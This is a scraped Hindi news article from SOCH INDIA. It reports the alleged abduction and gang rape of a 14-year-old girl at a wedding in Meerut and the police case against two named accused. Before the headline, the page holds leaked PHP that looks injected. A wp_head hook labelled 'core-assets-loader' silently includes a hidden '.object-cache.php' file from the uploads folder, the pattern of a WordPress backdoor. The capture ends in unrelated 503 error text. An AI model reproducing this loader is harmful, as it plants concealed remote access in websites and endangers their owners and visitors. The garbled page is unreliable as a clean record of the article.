add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); यूपी : शादी समारोह से युवती को उठा ले गए बेखौफ बदमाश, किया सामूहिक दुष्कर्म – SOCH INDIA
Menu

अपराध समाचार
यूपी : शादी समारोह से युवती को उठा ले गए बेखौफ बदमाश, किया सामूहिक दुष्कर्म

nobanner

उत्तर प्रदेश के मेरठ जिले के थाना रेलवे रोड क्षेत्र में शादी समारोह से अगवा कर 14 वर्षीय किशोरी से दो युवकों ने कथित रूप से सामूहिक दुष्कर्म किया. किशोरी के परिजनों की तहरीर पर पुलिस ने आरोपी युवकों के खिलाफ मुकदमा दर्ज कर उनकी गिरफ्तारी के प्रयास शुरु कर दिए हैं.

जिला पुलिस प्रवक्ता ने पीड़ित युवती द्वारा दी गई तहरीर के आधार पर आज घटना की जानकारी दी. उन्होंने बताया कि थाना रेलवे रोड क्षेत्र निवासी एक 14 वर्षीय किशोरी रविवार को परिजनों के साथ पड़ोस में ही एक शादी समारोह में गई थी. आरोप है कि यहां किशोरी के पड़ोस में ही रहने वाले नदीम ने अपने साथी शादाब के साथ मिल कर किशोरी को अगवा कर लिया.

दोनों किशोरी को कैंट इलाके के जंगल में ले गए, जहां उन्होंने किशोरी के साथ दुष्कर्म किया. घटना के बाद आरोपी किशोरी को बदहवास हालत में पास में ही सूनसान सड़क पर फेंक कर फरार हो गए. फरार होने से पहले आरोपियों ने घटना की शिकायत पुलिस से करने पर जान से मारने की धमकी दी.

किशोरी का मेडिकल करा कर पुलिस ने किशोरी को परिजनों को सौंप दिया है. वहीं किशोरी के परिजनों की तहरीर पर पुलिस ने आरोपियों के खिलाफ मुकदमा दर्ज कर उनकी तलाश शुरु कर दी है. इस घटना के बाद इलाके में लोग डरे हुए हैं. इसके साथ ही पुलिस शादी समारोह में आए लोगों से भी पूछताछ कर सकती है.

 

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.